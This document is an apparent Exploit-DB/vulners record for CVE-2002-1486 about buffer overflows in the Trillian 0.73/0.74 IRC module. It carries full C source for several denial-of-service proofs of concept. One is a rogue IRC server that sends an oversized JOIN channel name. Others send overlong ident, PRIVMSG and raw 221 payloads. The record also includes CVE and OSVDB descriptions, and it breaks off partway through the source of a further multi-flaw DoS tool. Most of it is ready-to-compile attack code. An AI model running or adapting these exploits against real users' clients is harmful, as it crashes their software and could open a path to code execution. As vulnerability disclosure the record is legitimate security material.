ID EDB-ID:21813 Type exploitdb Reporter Lance Fitz-Herbert Modified 2002-09-20T00:00:00
Description
Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability. CVE-2002-1486. DoS (denial-of-service) proof-of-concept exploit for the Windows platform.
source: http://www.securityfocus.com/bid/5765/info
The Trillian IRC module does not sufficiently check bounds on JOIN commands. A malicious IRC server may potentially exploit this condition to cause a denial of service or execute arbitrary code with the privileges of the client.
This issue was reported for Trillian versions 0.73 and 0.74. Earlier versions may also be affected.
/* Trillian-Join.c
Author: Lance Fitz-Herbert
Contact: IRC: Phrizer, DALnet - #KORP
ICQ: 23549284
Exploits the Trillian Join Flaw.
Tested On Version .74 and .73
Compiles with Borland 5.5 Commandline Tools.
This example only crashes (DoS) the Trillian client by sending an oversized
JOIN channel name; it makes no attempt at code execution and exists solely to
demonstrate that the overflow is reachable from a malicious IRC server.
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* File-scope listening socket; only main() reads or writes it. */
SOCKET s;
/* Fake server welcome (numeric 001) followed by a JOIN line whose channel
 * argument is left open: the trailing ':' starts the final parameter, so
 * whatever main() sends next, up to the newline, is parsed by the client
 * as the channel name. */
#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"
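/*
 * Entry point. Acts as a rogue IRC server on TCP/6667, waits for one client,
 * sends a fake 001 welcome plus a JOIN whose channel name is 300 bytes of
 * 'A' (the Trillian JOIN overflow trigger), then shuts down.
 *
 * Returns 0 after the payload has been sent, 1 on any Winsock setup failure.
 *
 * NOTE(review): the listener binds INADDR_ANY, so every host that can reach
 * port 6667 on this machine receives the crashing payload; run it only on an
 * isolated test network.
 */
int main(void) {
    SOCKET client = INVALID_SOCKET;
    WSADATA wsa_data;
    SOCKADDR_IN addr;
    /* Oversized channel name; deliberately NOT NUL-terminated. */
    char payload[300];
    int sent;

    printf("\nTrillian Join Flaw\n");
    printf("----------------------\n");
    printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
    /* Single literal: the original split this string across a raw line
     * break, which is not valid C. */
    printf("Tested On Version .74 and .73\nListening On Port 6667 For Connections\n\n");

    if (WSAStartup(MAKEWORD(1, 1), &wsa_data) != 0) {
        printf("ERROR: WSA Initialization failed.");
        return 1;
    }

    /* Create the listening socket. */
    s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) {
        printf("ERROR: Could Not Create Socket. Exiting\n");
        WSACleanup();
        return 1;
    }

    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(6667);
    addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(s, (LPSOCKADDR)&addr, sizeof addr) == SOCKET_ERROR) {
        printf("ERROR Binding Socket");
        closesocket(s);
        WSACleanup();
        return 1;
    }

    /* Make the socket listen. */
    if (listen(s, 10) == SOCKET_ERROR) {
        printf("ERROR: Couldnt Make Listening Socket\n");
        closesocket(s);
        WSACleanup();
        return 1;
    }

    /* accept() signals failure with INVALID_SOCKET, not SOCKET_ERROR; the
     * original compared against SOCKET_ERROR and only worked because both
     * are all-ones bit patterns once converted to SOCKET. */
    while (client == INVALID_SOCKET) {
        client = accept(s, NULL, NULL);
    }

    printf("Client Connected, Sending Payload\n");

    /* Fake welcome numeric followed by the open-ended JOIN prefix (MSG1). */
    send(client, MSG1, (int)strlen(MSG1), 0);

    /* The channel name. payload has no terminator, so its length must come
     * from sizeof: the original called strlen() on it and read past the
     * end of the array. */
    memset(payload, 'A', sizeof payload);
    sent = send(client, payload, (int)sizeof payload, 0);
    if (sent != (int)sizeof payload) {
        printf("WARNING: payload send incomplete (%d of %u bytes)\n",
               sent, (unsigned)sizeof payload);
    }
    /* Terminate the IRC line so the client parses it. */
    send(client, "\n", 1, 0);

    printf("Exiting\n");
    /* Win32 Sleep() takes milliseconds; no lowercase sleep() is declared by
     * the headers this file includes. Give the client a moment to read the
     * line before the connection goes away. */
    Sleep(100);
    closesocket(client);
    closesocket(s);
    WSACleanup();
    return 0;
}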
{"id": "EDB-ID:21813", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability", "description": "Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability. CVE-2002-1486. Dos exploit for windows platform", "published": "2002-09-20T00:00:00", "modified": "2002-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/21813/", "reporter": "Lance Fitz-Herbert", "references": [], "cvelist": ["CVE-2002-1486"], "lastseen": "2016-02-02T17:19:59", "viewCount": 3, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-02-02T17:19:59", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-1486"]}, {"type": "osvdb", "idList": ["OSVDB:10791", "OSVDB:10797", "OSVDB:10794", "OSVDB:10795", "OSVDB:10796"]}, {"type": "exploitdb", "idList": ["EDB-ID:21810", "EDB-ID:21823", "EDB-ID:21804", "EDB-ID:21816"]}], "modified": "2016-02-02T17:19:59", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/21813/", "sourceData": "source: http://www.securityfocus.com/bid/5765/info\r\n\r\nThe Trillian IRC module does not sufficiently check bounds on JOIN commands. A malicious IRC server may potentially exploit this condition to cause a denial of service or execute arbitrary code with the privileges of the client.\r\n\r\nThis issue was reported for Trillian versions 0.73 and 0.74. Earlier versions may also be affected. 
\r\n\r\n/* Trillian-Join.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits the Trillian Join Flaw.\r\n Tested On Version .74 and .73\r\n Compiles with Borland 5.5 Commandline Tools.\r\n\r\n This Example Will Just DoS The Trillian Client,\r\n not particularly useful, just proves the flaw exists.\r\n\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <winsock.h>\r\n\r\nSOCKET s;\r\n\r\n#define MSG1 \":server 001 target :target\\n:target!ident@address JOIN :\"\r\n\r\nint main() {\r\n\r\n SOCKET TempSock = SOCKET_ERROR;\r\n WSADATA WsaDat;\r\n SOCKADDR_IN Sockaddr;\r\n int nRet;\r\n char payload[300];\r\n\r\n printf(\"\\nTrillian Join Flaw\\n\");\r\n printf(\"----------------------\\n\");\r\n printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n printf(\"Tested On Version .74 and .73\\nListening On Port 6667 For\r\nConnections\\n\\n\");\r\n\r\n if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {\r\n printf(\"ERROR: WSA Initialization failed.\");\r\n return 0;\r\n }\r\n\r\n\r\n /* Create Socket */\r\n s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if (s == INVALID_SOCKET) {\r\n printf(\"ERROR: Could Not Create Socket. 
Exiting\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n Sockaddr.sin_port = htons(6667);\r\n Sockaddr.sin_family = AF_INET;\r\n Sockaddr.sin_addr.s_addr = INADDR_ANY;\r\n\r\n\r\n nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));\r\n if (nRet == SOCKET_ERROR) {\r\n printf(\"ERROR Binding Socket\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n /* Make Socket Listen */\r\n if (listen(s, 10) == SOCKET_ERROR) {\r\n printf(\"ERROR: Couldnt Make Listening Socket\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n while (TempSock == SOCKET_ERROR) {\r\n TempSock = accept(s, NULL, NULL);\r\n }\r\n\r\n printf(\"Client Connected, Sending Payload\\n\");\r\n\r\n send(TempSock,MSG1,strlen(MSG1),0);\r\n memset(payload,'A',300);\r\n send(TempSock,payload,strlen(payload),0);\r\n send(TempSock,\"\\n\",1,0);\r\n\r\n printf(\"Exiting\\n\");\r\n sleep(100);\r\n WSACleanup();\r\n return 0;\r\n}\r\n", "osvdbidlist": ["10796"]}
{"cve": [{"lastseen": "2020-10-03T11:37:00", "description": "Multiple buffer overflows in the IRC component of Trillian 0.73 and 0.74 allows remote malicious IRC servers to cause a denial of service and possibly execute arbitrary code via (1) a large response from the server, (2) a JOIN with a long channel name, (3) a long \"raw 221\" message, (4) a PRIVMSG with a long nickname, or (5) a long response from an IDENT server.", "edition": 3, "cvss3": {}, "published": "2003-04-02T05:00:00", "title": "CVE-2002-1486", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1486"], "modified": "2008-09-05T20:30:00", "cpe": ["cpe:/a:cerulean_studios:trillian:0.725", "cpe:/a:cerulean_studios:trillian:0.73", "cpe:/a:cerulean_studios:trillian:0.74"], "id": "CVE-2002-1486", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1486", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cerulean_studios:trillian:0.74:*:*:*:*:*:*:*", "cpe:2.3:a:cerulean_studios:trillian:0.73:*:*:*:*:*:*:*", "cpe:2.3:a:cerulean_studios:trillian:0.725:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of a raw 221 IRC message resulting in a buffer overflow. 
With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity, and/or availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of a raw 221 IRC message resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity, and/or availability.\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-09/0266.html\nISS X-Force ID: 10151\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5769\n", "modified": "2002-09-21T22:38:24", "published": "2002-09-21T22:38:24", "href": "https://vulners.com/osvdb/OSVDB:10797", "id": "OSVDB:10797", "type": "osvdb", "title": "Trillian IRC Component raw 221 Mode Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of a data block from an IDENT server resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or the execution of arbitrary code resulting in a loss of integrity, and/or availability.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Disable the Ident server\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of a data block from an IDENT server resulting in a buffer overflow. 
With a specially crafted request, an attacker can cause a denial of service or the execution of arbitrary code resulting in a loss of integrity, and/or availability.\n## Manual Testing Notes\nSending 418+ bytes to the Identd server (TCP 113) can cause the Trillian client to crash\n## References:\nVendor URL: http://ceruleanstudios.com/\nSecurity Tracker: 1005236\nMail List Post: http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0139.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-09/0224.html\nKeyword: TCP 113\nISS X-Force ID: 10118\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5733\n", "modified": "2002-09-14T22:39:49", "published": "2002-09-14T22:39:49", "href": "https://vulners.com/osvdb/OSVDB:10794", "id": "OSVDB:10794", "type": "osvdb", "title": "Trillian IRC Component IDENT Server Remote Overflow DoS", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of the \"Channel\" variable in the Join command resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity, and/or availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of the \"Channel\" variable in the Join command resulting in a buffer overflow. 
With a specially crafted request, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity, and/or availability.\n## References:\nVendor URL: http://ceruleanstudios.com/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-09/0258.html\nISS X-Force ID: 10150\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5765\n", "modified": "2002-09-20T22:37:28", "published": "2002-09-20T22:37:28", "href": "https://vulners.com/osvdb/OSVDB:10796", "id": "OSVDB:10796", "type": "osvdb", "title": "Trillian IRC Component JOIN Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate IRC channel name s resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate IRC channel name s resulting in a buffer overflow. 
With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-07/0489.html\nISS X-Force ID: 9761\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5388\n", "modified": "2002-08-01T23:05:57", "published": "2002-08-01T23:05:57", "href": "https://vulners.com/osvdb/OSVDB:10791", "id": "OSVDB:10791", "type": "osvdb", "title": "Trillian IRC Component Channel Name Format String", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-1486"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of the \"Sender\" variable in the Privmsg command resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service or the execution of arbitrary code resulting in a loss of integrity, and/or availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Trillian. Trillian fails to validate the length of the \"Sender\" variable in the Privmsg command resulting in a buffer overflow. 
With a specially crafted request, an attacker can cause a denial of service or the execution of arbitrary code resulting in a loss of integrity, and/or availability.\n## Manual Testing Notes\nThe exploit occurs when the \"Sender\" variable is larger than 206 bytes.\n## References:\nVendor URL: http://ceruleanstudios.com/\nMail List Post: http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0140.html\nISS X-Force ID: 10143\nGeneric Exploit URL: http://packetstormsecurity.org/0209-exploits/Trillian-Privmsg.c\n[CVE-2002-1486](https://vulners.com/cve/CVE-2002-1486)\nBugtraq ID: 5755\n", "modified": "2002-09-19T22:40:30", "published": "2002-09-19T22:40:30", "href": "https://vulners.com/osvdb/OSVDB:10795", "id": "OSVDB:10795", "type": "osvdb", "title": "Trillian IRC Component PRIVMSG Command Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T17:18:44", "description": "Trillian 0.6351/0.7x Identd Buffer Overflow Vulnerability. CVE-2002-1486. Remote exploit for windows platform", "published": "2002-09-18T00:00:00", "type": "exploitdb", "title": "Trillian 0.6351/0.7x Identd Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1486"], "modified": "2002-09-18T00:00:00", "id": "EDB-ID:21804", "href": "https://www.exploit-db.com/exploits/21804/", "sourceData": "source: http://www.securityfocus.com/bid/5733/info\r\n\r\nTrillian ships with an ident server to facilitate connections to IRC servers that require an ident response before allowing access. A buffer overflow condition exists in the Trillian ident server, which may potentially be exploited to cause a denial of service or execute arbitrary code.\r\n\r\nWhen the ident server receives a malformed request that is 418 bytes or more in length, the client crashes and memory is corrupted. 
It may be possible for an attacker to exploit the resulting memory corruption to execute arbitrary instructions with the privileges of the ident server.\r\n\r\n/* Trillian-Ident.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits the Trillian Ident Flaw.\r\n Tested On Version .74 and .73\r\n Compiles with Borland 5.5\r\n This Example Will Just DoS The Trillian Client.\r\n\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\nchar payload[500];\r\nint main(int argc, char * argv[]) {\r\n int iret;\r\n struct hostent *host;\r\n SOCKET sockhandle;\r\n SOCKADDR_IN address;\r\n WSADATA wsdata;\r\n\r\n if (argc<2) {\r\n printf(\"\\nTrillian Ident DoS\\n\");\r\n printf(\"----------------------\\n\");\r\n printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n printf(\"Tested On Version .74 and .73\\n\\n\");\r\n printf(\"Usage: trillian-ident <address>\");\r\n return 0;\r\n }\r\n\r\n WSAStartup(MAKEWORD(1,1),&wsdata);\r\n printf(\"Making Socket Now...\\n\");\r\n sockhandle = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);\r\n\r\n if (sockhandle == SOCKET_ERROR) {\r\n printf(\"Error Creating Socket\\n\");\r\n WSACleanup();\r\n return 1;\r\n }\r\n\r\n printf(\"Socket Created\\n\");\r\n\r\n address.sin_family = AF_INET;\r\n address.sin_port = htons(113);\r\n address.sin_addr.s_addr = inet_addr(argv[1]);\r\n\r\n\r\n if (address.sin_addr.s_addr == INADDR_NONE) {\r\n host = NULL;\r\n printf(\"Trying To Resolve Host\\n\");\r\n host = gethostbyname(argv[1]);\r\n if (host == NULL) {\r\n printf(\"Uknown Host: %s\\n\",argv[1]);\r\n WSACleanup();\r\n return 1;\r\n }\r\n memcpy(&address.sin_addr, host->h_addr_list[0],host->h_length);\r\n }\r\n\r\n\r\n\r\n printf(\"Connecting To Server...\\n\");\r\n iret = connect(sockhandle, (struct sockaddr *) &address, sizeof(address));\r\n\r\n if (iret == SOCKET_ERROR) {\r\n printf(\"Couldnt Connect\\n\");\r\n WSACleanup();\r\n return 1;\r\n }\r\n\r\n 
printf(\"Connected to %s!\\nSending Payload\\n\",argv[1]);\r\n memset(payload,'A',500);\r\n send(sockhandle,payload,strlen(payload),0);\r\n Sleep(100);\r\n WSACleanup();\r\n return 0;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21804/"}, {"lastseen": "2016-02-02T17:19:32", "description": "Trillian 0.73/0.74 IRC PRIVMSG Buffer Overflow Vulnerability. CVE-2002-1486. Remote exploit for windows platform", "published": "2002-09-19T00:00:00", "type": "exploitdb", "title": "Trillian 0.73/0.74 - IRC PRIVMSG Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1486"], "modified": "2002-09-19T00:00:00", "id": "EDB-ID:21810", "href": "https://www.exploit-db.com/exploits/21810/", "sourceData": "source: http://www.securityfocus.com/bid/5755/info\r\n\r\nTrillian is an instant messaging client that supports a number of protocols (including IRC, ICQ, MSN). It is available for Microsoft Windows systems.\r\n\r\nA buffer overflow has been discovered in Trillian version .73 and .74. 
When processing a PRIVMSG command with an overly large sender name, a buffer overflow will occur resulting in memory corruption and a denial of service.\r\n\r\nAlthough not yet confirmed, because memory can be overwritten, it may be possible for arbitrary attacker-supplied code to be executed with the privileges of the client.\r\n\r\n/* Trillian-Privmsg.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits the Trillian Privmsg Flaw.\r\n Tested On Version .74 and .73\r\n Compiles with Borland 5.5 Commandline Tools.\r\n\r\n This Example Will Just DoS The Trillian Client,\r\n not particularly useful, just proves the flaw exists.\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <winsock.h>\r\n\r\nSOCKET s;\r\n\r\n#define MSG1 \":server 001 target :target\\n:\"\r\n#define MSG2 \"!ident@address PRIVMSG target :You are the weakest link, \r\nGoodbye.\\n\"\r\n\r\nint main() {\r\n\r\n SOCKET TempSock = SOCKET_ERROR;\r\n WSADATA WsaDat;\r\n SOCKADDR_IN Sockaddr;\r\n int nRet;\r\n char payload[300];\r\n\r\n printf(\"\\nTrillian Privmsg Flaw\\n\");\r\n printf(\"----------------------\\n\");\r\n printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n printf(\"Tested On Version .74 and .73\\nListening On Port 6667 For \r\nConnections\\n\\n\");\r\n\r\n if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {\r\n printf(\"ERROR: WSA Initialization failed.\");\r\n return 0;\r\n }\r\n\r\n\r\n /* Create Socket */\r\n s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if (s == INVALID_SOCKET) {\r\n printf(\"ERROR: Could Not Create Socket. 
Exiting\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n Sockaddr.sin_port = htons(6667);\r\n Sockaddr.sin_family = AF_INET;\r\n Sockaddr.sin_addr.s_addr = INADDR_ANY;\r\n\r\n\r\n nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));\r\n if (nRet == SOCKET_ERROR) {\r\n printf(\"ERROR Binding Socket\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n /* Make Socket Listen */\r\n if (listen(s, 10) == SOCKET_ERROR) {\r\n printf(\"ERROR: Couldnt Make Listening Socket\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n while (TempSock == SOCKET_ERROR) {\r\n TempSock = accept(s, NULL, NULL);\r\n }\r\n\r\n printf(\"Client Connected, Sending Payload\\n\");\r\n\r\n send(TempSock,MSG1,strlen(MSG1),0);\r\n memset(payload,'A',300);\r\n send(TempSock,payload,strlen(payload),0);\r\n send(TempSock,MSG2,strlen(MSG2),0);\r\n\r\n printf(\"Exiting\\n\");\r\n sleep(100);\r\n WSACleanup();\r\n return 0;\r\n}\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21810/"}, {"lastseen": "2016-02-02T17:20:27", "description": "Trillian 0.725/0.73/0.74 IRC User Mode Numeric Remote Buffer Overflow Vulnerability. CVE-2002-1486. Dos exploit for windows platform", "published": "2002-09-21T00:00:00", "type": "exploitdb", "title": "Trillian 0.725/0.73/0.74 IRC User Mode Numeric Remote Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1486"], "modified": "2002-09-21T00:00:00", "id": "EDB-ID:21816", "href": "https://www.exploit-db.com/exploits/21816/", "sourceData": "source: http://www.securityfocus.com/bid/5769/info\r\n\r\nTrillian is an instant messaging client that supports a number of protocols (including IRC, ICQ, MSN). It is available for Microsoft Windows systems. \r\n\r\nIt has been reported that Trillian does not perform adequate bounds checking when receiving IRC raw user mode messages. 
When a Trillian client receives an instruction from a server for a raw user mode change containing 251 or more bytes of data, a buffer overflow occurs. This could result in denial of service, or the execution of arbitrary attacker supplied instructions.\r\n\r\n/* Trillian-221.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits the Trillian \"Raw 221\" Flaw.\r\n Tested On Version .74 and .73\r\n Compiles with Borland 5.5 Commandline Tools.\r\n\r\n This Example Will Just DoS The Trillian Client,\r\n not particularly useful, just proves the flaw exists.\r\n\r\n Greets: AnAh, Hooves.\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <winsock.h>\r\n\r\nSOCKET s;\r\n\r\n#define MSG1 \":server 221 target \"\r\n\r\nint main() {\r\n\r\n SOCKET TempSock = SOCKET_ERROR;\r\n WSADATA WsaDat;\r\n SOCKADDR_IN Sockaddr;\r\n int nRet;\r\n char payload[257];\r\n\r\n printf(\"\\nTrillian Raw 221 Flaw\\n\");\r\n printf(\"---------------------\\n\");\r\n printf(\"Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\\n\");\r\n printf(\"Tested On Version .74 and .73\\nListening On Port 6667 For \r\nConnections\\n\\n\");\r\n\r\n if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {\r\n printf(\"ERROR: WSA Initialization failed.\");\r\n return 0;\r\n }\r\n\r\n\r\n /* Create Socket */\r\n s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if (s == INVALID_SOCKET) {\r\n printf(\"ERROR: Could Not Create Socket. 
Exiting\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n Sockaddr.sin_port = htons(6667);\r\n Sockaddr.sin_family = AF_INET;\r\n Sockaddr.sin_addr.s_addr = INADDR_ANY;\r\n\r\n\r\n nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));\r\n if (nRet == SOCKET_ERROR) {\r\n printf(\"ERROR Binding Socket\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n /* Make Socket Listen */\r\n if (listen(s, 10) == SOCKET_ERROR) {\r\n printf(\"ERROR: Couldnt Make Listening Socket\\n\");\r\n WSACleanup();\r\n return 0;\r\n }\r\n\r\n while (TempSock == SOCKET_ERROR) {\r\n TempSock = accept(s, NULL, NULL);\r\n }\r\n\r\n printf(\"Client Connected, Sending Payload\\n\");\r\n\r\n send(TempSock,MSG1,strlen(MSG1),0);\r\n memset(payload,'A',257);\r\n send(TempSock,payload,strlen(payload),0);\r\n send(TempSock,\"\\n\",1,0);\r\n\r\n printf(\"Exiting\\n\");\r\n sleep(100);\r\n WSACleanup();\r\n return 0;\r\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21816/"}, {"lastseen": "2016-02-02T17:21:26", "description": "Trillian 0.74 IRC Oversized Data Block Buffer Overflow Vulnerability. CVE-2002-1486. Dos exploit for windows platform", "published": "2002-09-22T00:00:00", "type": "exploitdb", "title": "Trillian 0.74 IRC Oversized Data Block Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1486"], "modified": "2002-09-22T00:00:00", "id": "EDB-ID:21823", "href": "https://www.exploit-db.com/exploits/21823/", "sourceData": "source: http://www.securityfocus.com/bid/5777/info\r\n\r\nA vulnerability has been reported for Trillian. Reportedly, Trillian is prone to a buffer overflow condition when it receives blocks of data that are larger than 4095 bytes. \r\n\r\nA malicious server may exploit this condition to cause a denial of service in the client. 
This may also potentially be exploited to execute arbitrary code, though this possibility has not been confirmed.\r\n\r\n/* Trillian-Dos.c\r\n Author: Lance Fitz-Herbert\r\n Contact: IRC: Phrizer, DALnet - #KORP\r\n ICQ: 23549284\r\n\r\n Exploits Multiple Trillian DoS Flaws:\r\n Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333,\r\n352, 367\r\n Part Flaw\r\n Data length flaw.\r\n\r\n Tested On Version .74\r\n Compiles with Borland 5.5 Commandline Tools.\r\n\r\n These Examples Will Just DoS The Trillian Client,\r\n*/\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <winsock.h>\r\n\r\nSOCKET s;\r\n\r\n#define SERVER \":server \"\r\n#define PART \":nick!ident@address PART\\n\"\r\n\r\nint main(int argc, char *argv[]) {\r\n\t\t SOCKET TempSock = SOCKET_ERROR;\r\n\t\t WSADATA WsaDat;\r\n\t\t SOCKADDR_IN Sockaddr;\r\n\t\t int nRet;\r\n\t\t char payload[4096];\r\n\t\t if (argc < 2) {\r\n\t\t \t\t usage();\r\n\t\t \t\t return 1;\r\n\t\t }\r\n\t\t if ((!strcmp(argv[1],\"raw\")) && (argc < 3) || (strcmp(argv[1],\"raw\")) &&\r\n(strcmp(argv[1],\"part\")) && (strcmp(argv[1],\"data\"))) {\r\n\t\t \t\t 